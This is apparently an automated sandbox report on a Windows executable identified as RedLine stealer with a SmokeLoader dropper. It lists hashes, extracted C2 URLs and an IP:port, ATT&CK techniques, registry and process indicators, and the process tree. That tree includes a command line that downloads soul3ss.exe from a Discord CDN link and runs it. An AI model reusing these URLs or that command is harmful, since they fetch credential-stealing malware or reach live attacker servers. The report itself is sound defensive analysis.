redline | f6e8f13adceaaac1b6e35e41b0f2442bbd9e11288895b4fe9b40b0f97b83d7e2

Analysis

max time kernel
151s
max time network
156s
platform
windows10_x64
resource
win10v20210410
submitted
23-08-2021 13:56

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

f6e8f13adceaaac1b6e35e41b0f2442bbd9e11288895b4fe9b40b0f97b83d7e2.exe
Size

278KB
MD5

0d90e4f66414c1bc9779dbd3f776becd
SHA1

5abbb99c25720aaaa253d27ca6d71769b1fd1469
SHA256

f6e8f13adceaaac1b6e35e41b0f2442bbd9e11288895b4fe9b40b0f97b83d7e2
SHA512

0a0a5775f0a04768be9cf20917b2a26dcd97d139dce1233745f4e37277d271bfeacaa60233bad02a1805a9db9c44bca8e4d73d83d2cff9f00fda22e35889bdfb

Score

10^/10

redline smokeloader @soul3ss backdoor discovery infostealer spyware stealer trojan upx

Malware Config

Extracted

Family

smokeloader

Version

2020

http://aucmoney.com/upload/

http://thegymmum.com/upload/

http://atvcampingtrips.com/upload/

http://kuapakualaman.com/upload/

http://renatazarazua.com/upload/

http://nasufmutlu.com/upload/

rc4.i32

Extracted

Family

redline

Botnet

@soul3ss

188.130.139.12:30376

Signatures

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine Payload 2 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\30265\soul3ss.exe	family_redline
C:\Users\Admin\AppData\Local\Temp\30265\soul3ss.exe	family_redline

SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader
Downloads MZ/PE file
Executes dropped EXE 6 IoCs

Processes:

1492.exeextd.exeextd.exeextd.exesoul3ss.exeextd.exe

pid process

3220 1492.exe
4048 extd.exe
4220 extd.exe
4172 extd.exe
4300 soul3ss.exe
4232 extd.exe

pid	process
3220	1492.exe
4048	extd.exe
4220	extd.exe
4172	extd.exe
4300	soul3ss.exe
4232	extd.exe

UPX packed file 5 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\159C.tmp\15AD.tmp\extd.exe	upx
C:\Users\Admin\AppData\Local\Temp\159C.tmp\15AD.tmp\extd.exe	upx
C:\Users\Admin\AppData\Local\Temp\159C.tmp\15AD.tmp\extd.exe	upx
C:\Users\Admin\AppData\Local\Temp\159C.tmp\15AD.tmp\extd.exe	upx
C:\Users\Admin\AppData\Local\Temp\159C.tmp\15AD.tmp\extd.exe	upx

Deletes itself 1 IoCs

Processes:

pid process

3008
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

pid	process
3008

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

f6e8f13adceaaac1b6e35e41b0f2442bbd9e11288895b4fe9b40b0f97b83d7e2.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	f6e8f13adceaaac1b6e35e41b0f2442bbd9e11288895b4fe9b40b0f97b83d7e2.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	f6e8f13adceaaac1b6e35e41b0f2442bbd9e11288895b4fe9b40b0f97b83d7e2.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	f6e8f13adceaaac1b6e35e41b0f2442bbd9e11288895b4fe9b40b0f97b83d7e2.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

f6e8f13adceaaac1b6e35e41b0f2442bbd9e11288895b4fe9b40b0f97b83d7e2.exe

pid	process
4448	f6e8f13adceaaac1b6e35e41b0f2442bbd9e11288895b4fe9b40b0f97b83d7e2.exe
4448	f6e8f13adceaaac1b6e35e41b0f2442bbd9e11288895b4fe9b40b0f97b83d7e2.exe
3008
3008
3008
3008
3008
3008
3008
3008
3008
3008
3008
3008
3008
3008
3008
3008
3008
3008
3008
3008
3008
3008
3008
3008
3008
3008
3008
3008
3008
3008
3008
3008
3008
3008
3008
3008
3008
3008
3008
3008
3008
3008
3008
3008
3008
3008
3008
3008
3008
3008
3008
3008
3008
3008
3008
3008
3008
3008
3008
3008
3008
3008

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

pid process

3008
Suspicious behavior: MapViewOfSection 1 IoCs

Processes:

f6e8f13adceaaac1b6e35e41b0f2442bbd9e11288895b4fe9b40b0f97b83d7e2.exe

pid process

4448 f6e8f13adceaaac1b6e35e41b0f2442bbd9e11288895b4fe9b40b0f97b83d7e2.exe

pid	process
3008

Suspicious use of AdjustPrivilegeToken 51 IoCs

Processes:

soul3ss.exe

description	pid	process
Token: SeShutdownPrivilege	3008
Token: SeCreatePagefilePrivilege	3008
Token: SeShutdownPrivilege	3008
Token: SeCreatePagefilePrivilege	3008
Token: SeShutdownPrivilege	3008
Token: SeCreatePagefilePrivilege	3008
Token: SeShutdownPrivilege	3008
Token: SeCreatePagefilePrivilege	3008
Token: SeShutdownPrivilege	3008
Token: SeCreatePagefilePrivilege	3008
Token: SeShutdownPrivilege	3008
Token: SeCreatePagefilePrivilege	3008
Token: SeShutdownPrivilege	3008
Token: SeCreatePagefilePrivilege	3008
Token: SeShutdownPrivilege	3008
Token: SeCreatePagefilePrivilege	3008
Token: SeShutdownPrivilege	3008
Token: SeCreatePagefilePrivilege	3008
Token: SeShutdownPrivilege	3008
Token: SeCreatePagefilePrivilege	3008
Token: SeShutdownPrivilege	3008
Token: SeCreatePagefilePrivilege	3008
Token: SeShutdownPrivilege	3008
Token: SeCreatePagefilePrivilege	3008
Token: SeShutdownPrivilege	3008
Token: SeCreatePagefilePrivilege	3008
Token: SeShutdownPrivilege	3008
Token: SeCreatePagefilePrivilege	3008
Token: SeShutdownPrivilege	3008
Token: SeCreatePagefilePrivilege	3008
Token: SeShutdownPrivilege	3008
Token: SeCreatePagefilePrivilege	3008
Token: SeShutdownPrivilege	3008
Token: SeCreatePagefilePrivilege	3008
Token: SeShutdownPrivilege	3008
Token: SeCreatePagefilePrivilege	3008
Token: SeShutdownPrivilege	3008
Token: SeCreatePagefilePrivilege	3008
Token: SeShutdownPrivilege	3008
Token: SeCreatePagefilePrivilege	3008
Token: SeDebugPrivilege	4300	soul3ss.exe
Token: SeShutdownPrivilege	3008
Token: SeCreatePagefilePrivilege	3008
Token: SeShutdownPrivilege	3008
Token: SeCreatePagefilePrivilege	3008
Token: SeShutdownPrivilege	3008
Token: SeCreatePagefilePrivilege	3008
Token: SeShutdownPrivilege	3008
Token: SeCreatePagefilePrivilege	3008
Token: SeShutdownPrivilege	3008
Token: SeCreatePagefilePrivilege	3008

Suspicious use of UnmapMainImage 1 IoCs

Processes:

pid process

3008

pid	process
3008

Suspicious use of WriteProcessMemory 15 IoCs

Processes:

1492.execmd.exe

description	pid	process	target process
PID 3008 wrote to memory of 3220	3008		1492.exe
PID 3008 wrote to memory of 3220	3008		1492.exe
PID 3220 wrote to memory of 3988	3220	1492.exe	cmd.exe
PID 3220 wrote to memory of 3988	3220	1492.exe	cmd.exe
PID 3988 wrote to memory of 4048	3988	cmd.exe	extd.exe
PID 3988 wrote to memory of 4048	3988	cmd.exe	extd.exe
PID 3988 wrote to memory of 4220	3988	cmd.exe	extd.exe
PID 3988 wrote to memory of 4220	3988	cmd.exe	extd.exe
PID 3988 wrote to memory of 4172	3988	cmd.exe	extd.exe
PID 3988 wrote to memory of 4172	3988	cmd.exe	extd.exe
PID 3988 wrote to memory of 4300	3988	cmd.exe	soul3ss.exe
PID 3988 wrote to memory of 4300	3988	cmd.exe	soul3ss.exe
PID 3988 wrote to memory of 4300	3988	cmd.exe	soul3ss.exe
PID 3988 wrote to memory of 4232	3988	cmd.exe	extd.exe
PID 3988 wrote to memory of 4232	3988	cmd.exe	extd.exe

C:\Users\Admin\AppData\Local\Temp\f6e8f13adceaaac1b6e35e41b0f2442bbd9e11288895b4fe9b40b0f97b83d7e2.exe
"C:\Users\Admin\AppData\Local\Temp\f6e8f13adceaaac1b6e35e41b0f2442bbd9e11288895b4fe9b40b0f97b83d7e2.exe"
1⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:4448

C:\Users\Admin\AppData\Local\Temp\1492.exe
C:\Users\Admin\AppData\Local\Temp\1492.exe
1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3220

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\159C.tmp\15AD.tmp\15AE.bat C:\Users\Admin\AppData\Local\Temp\1492.exe"
2⤵
- Suspicious use of WriteProcessMemory
PID:3988

C:\Users\Admin\AppData\Local\Temp\159C.tmp\15AD.tmp\extd.exe
C:\Users\Admin\AppData\Local\Temp\159C.tmp\15AD.tmp\extd.exe "/hideself" "" "" "" "" "" "" "" ""
3⤵
- Executes dropped EXE
PID:4048

C:\Users\Admin\AppData\Local\Temp\159C.tmp\15AD.tmp\extd.exe
C:\Users\Admin\AppData\Local\Temp\159C.tmp\15AD.tmp\extd.exe "/random" "9000000" "" "" "" "" "" "" ""
3⤵
- Executes dropped EXE
PID:4220

C:\Users\Admin\AppData\Local\Temp\159C.tmp\15AD.tmp\extd.exe
C:\Users\Admin\AppData\Local\Temp\159C.tmp\15AD.tmp\extd.exe "/download" "https://cdn.discordapp.com/attachments/879335227095416884/879356613826314250/soul3ss.exe" "soul3ss.exe" "" "" "" "" "" ""
3⤵
- Executes dropped EXE
PID:4172

C:\Users\Admin\AppData\Local\Temp\30265\soul3ss.exe
soul3ss.exe
3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4300

C:\Users\Admin\AppData\Local\Temp\159C.tmp\15AD.tmp\extd.exe
C:\Users\Admin\AppData\Local\Temp\159C.tmp\15AD.tmp\extd.exe "/sleep" "9000009" "" "" "" "" "" "" ""
3⤵
- Executes dropped EXE
PID:4232

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\1492.exe
MD5
e16f915796d4762014fc3864d4444ac3

SHA1
819364784cf0d3fe440b6c9a3950de7fa093e805

SHA256
65dee75f5d4f0d7e0c1065a689ebe79f67c87a4d3d9654193164128e859a0ddd

SHA512
1c3721ebe22c1e9b9b5f51926d9e1bd1d26fca9b57f25161afefdeca9bdb3a1551fb4931fdbbe16df59c43c8a4eaa2131ab508a97a39cd6ddaf04003d9adca2a

Download Submit
C:\Users\Admin\AppData\Local\Temp\1492.exe
MD5
e16f915796d4762014fc3864d4444ac3

SHA1
819364784cf0d3fe440b6c9a3950de7fa093e805

SHA256
65dee75f5d4f0d7e0c1065a689ebe79f67c87a4d3d9654193164128e859a0ddd

SHA512
1c3721ebe22c1e9b9b5f51926d9e1bd1d26fca9b57f25161afefdeca9bdb3a1551fb4931fdbbe16df59c43c8a4eaa2131ab508a97a39cd6ddaf04003d9adca2a

Download Submit
C:\Users\Admin\AppData\Local\Temp\159C.tmp\15AD.tmp\15AE.bat
MD5
ca886f1ea953c266877e182b642b4fda

SHA1
11f08b489fe22035b7f024494a2f2351bf2b27ac

SHA256
fbc6462d26860e35e523a5742f8da38cc74188ee877b9eb4679bc185aba00579

SHA512
b1d00cd16eca756d57e92c22822394af3fa55f657dc36405556d82b4f3d9db7676f6bf7b01adb18679ff870867c5d2bac1dac5995a75c2d6870b84d5917fa4ba

Download Submit
C:\Users\Admin\AppData\Local\Temp\159C.tmp\15AD.tmp\extd.exe
MD5
b019efc4814c7a73b1413a335be1fa13

SHA1
6e093c94cfa4a0fe25e626875f2b06a5cbc622d2

SHA256
a13ac752c70e4bbd3cd8a58c48d41a7d80946ad2a92780ee26f47100a01e345e

SHA512
d8eae2f4e64ffd4cc3e6398a0e69aa54f7cc98a461d515cb7d8d9606b65c1bb1d70ff1a1cbbb6b84291898fe5d8926b908fdf46ed22ab5d8fc52a6c60bc7120b

Download Submit
C:\Users\Admin\AppData\Local\Temp\159C.tmp\15AD.tmp\extd.exe
MD5
b019efc4814c7a73b1413a335be1fa13

SHA1
6e093c94cfa4a0fe25e626875f2b06a5cbc622d2

SHA256
a13ac752c70e4bbd3cd8a58c48d41a7d80946ad2a92780ee26f47100a01e345e

SHA512
d8eae2f4e64ffd4cc3e6398a0e69aa54f7cc98a461d515cb7d8d9606b65c1bb1d70ff1a1cbbb6b84291898fe5d8926b908fdf46ed22ab5d8fc52a6c60bc7120b

Download Submit
C:\Users\Admin\AppData\Local\Temp\159C.tmp\15AD.tmp\extd.exe
MD5
b019efc4814c7a73b1413a335be1fa13

SHA1
6e093c94cfa4a0fe25e626875f2b06a5cbc622d2

SHA256
a13ac752c70e4bbd3cd8a58c48d41a7d80946ad2a92780ee26f47100a01e345e

SHA512
d8eae2f4e64ffd4cc3e6398a0e69aa54f7cc98a461d515cb7d8d9606b65c1bb1d70ff1a1cbbb6b84291898fe5d8926b908fdf46ed22ab5d8fc52a6c60bc7120b

Download Submit
C:\Users\Admin\AppData\Local\Temp\159C.tmp\15AD.tmp\extd.exe
MD5
b019efc4814c7a73b1413a335be1fa13

SHA1
6e093c94cfa4a0fe25e626875f2b06a5cbc622d2

SHA256
a13ac752c70e4bbd3cd8a58c48d41a7d80946ad2a92780ee26f47100a01e345e

SHA512
d8eae2f4e64ffd4cc3e6398a0e69aa54f7cc98a461d515cb7d8d9606b65c1bb1d70ff1a1cbbb6b84291898fe5d8926b908fdf46ed22ab5d8fc52a6c60bc7120b

Download Submit
C:\Users\Admin\AppData\Local\Temp\159C.tmp\15AD.tmp\extd.exe
MD5
b019efc4814c7a73b1413a335be1fa13

SHA1
6e093c94cfa4a0fe25e626875f2b06a5cbc622d2

SHA256
a13ac752c70e4bbd3cd8a58c48d41a7d80946ad2a92780ee26f47100a01e345e

SHA512
d8eae2f4e64ffd4cc3e6398a0e69aa54f7cc98a461d515cb7d8d9606b65c1bb1d70ff1a1cbbb6b84291898fe5d8926b908fdf46ed22ab5d8fc52a6c60bc7120b

Download Submit
C:\Users\Admin\AppData\Local\Temp\30265\soul3ss.exe
MD5
411ca7ba89ae45e92f9ed4663f903335

SHA1
6360b07844800b8e6e6e2b11ee3c8d051c4a2e96

SHA256
6780a257463d037daff9f626aecee2347177edfb0851ee12d33ba225ab38f009

SHA512
bfd58e96af22f17fab2cff4b360d79621b738128c61f01420963a1119d27320eb97a64fef42819e9ea7ffab39289f19b82f8911e227236435a87151d55d9e754

Download Submit
C:\Users\Admin\AppData\Local\Temp\30265\soul3ss.exe
MD5
411ca7ba89ae45e92f9ed4663f903335

SHA1
6360b07844800b8e6e6e2b11ee3c8d051c4a2e96

SHA256
6780a257463d037daff9f626aecee2347177edfb0851ee12d33ba225ab38f009

SHA512
bfd58e96af22f17fab2cff4b360d79621b738128c61f01420963a1119d27320eb97a64fef42819e9ea7ffab39289f19b82f8911e227236435a87151d55d9e754

Download Submit
memory/3008-116-0x0000000000660000-0x0000000000676000-memory.dmp

Filesize
88KB

Download
memory/3220-117-0x0000000000000000-mapping.dmp

Download
memory/3988-120-0x0000000000000000-mapping.dmp

Download
memory/4048-122-0x0000000000000000-mapping.dmp

Download
memory/4172-127-0x0000000000000000-mapping.dmp

Download
memory/4220-125-0x0000000000000000-mapping.dmp

Download
memory/4232-131-0x0000000000000000-mapping.dmp

Download
memory/4300-144-0x0000000009290000-0x0000000009291000-memory.dmp

Filesize
4KB

Download
memory/4300-141-0x00000000067C0000-0x00000000067C1000-memory.dmp

Filesize
4KB

Download
memory/4300-149-0x0000000009FC0000-0x0000000009FC1000-memory.dmp

Filesize
4KB

Download
memory/4300-134-0x0000000000FE0000-0x0000000000FE1000-memory.dmp

Filesize
4KB

Download
memory/4300-136-0x0000000005D70000-0x0000000005D71000-memory.dmp

Filesize
4KB

Download
memory/4300-137-0x0000000006880000-0x0000000006881000-memory.dmp

Filesize
4KB

Download
memory/4300-138-0x00000000059F0000-0x00000000059F1000-memory.dmp

Filesize
4KB

Download
memory/4300-139-0x00000000059A0000-0x00000000059A1000-memory.dmp

Filesize
4KB

Download
memory/4300-140-0x0000000005C30000-0x0000000005C31000-memory.dmp

Filesize
4KB

Download
memory/4300-148-0x00000000097C0000-0x00000000097C1000-memory.dmp

Filesize
4KB

Download
memory/4300-142-0x0000000006760000-0x0000000006761000-memory.dmp

Filesize
4KB

Download
memory/4300-143-0x0000000005870000-0x0000000005D6E000-memory.dmp

Filesize
5.0MB

Download
memory/4300-129-0x0000000000000000-mapping.dmp

Download
memory/4300-145-0x0000000009990000-0x0000000009991000-memory.dmp

Filesize
4KB

Download
memory/4300-146-0x0000000009210000-0x0000000009211000-memory.dmp

Filesize
4KB

Download
memory/4300-147-0x00000000095E0000-0x00000000095E1000-memory.dmp

Filesize
4KB

Download
memory/4448-115-0x0000000000400000-0x00000000023B0000-memory.dmp

Filesize
31.7MB

Download
memory/4448-114-0x0000000000030000-0x0000000000039000-memory.dmp

Filesize
36KB

Download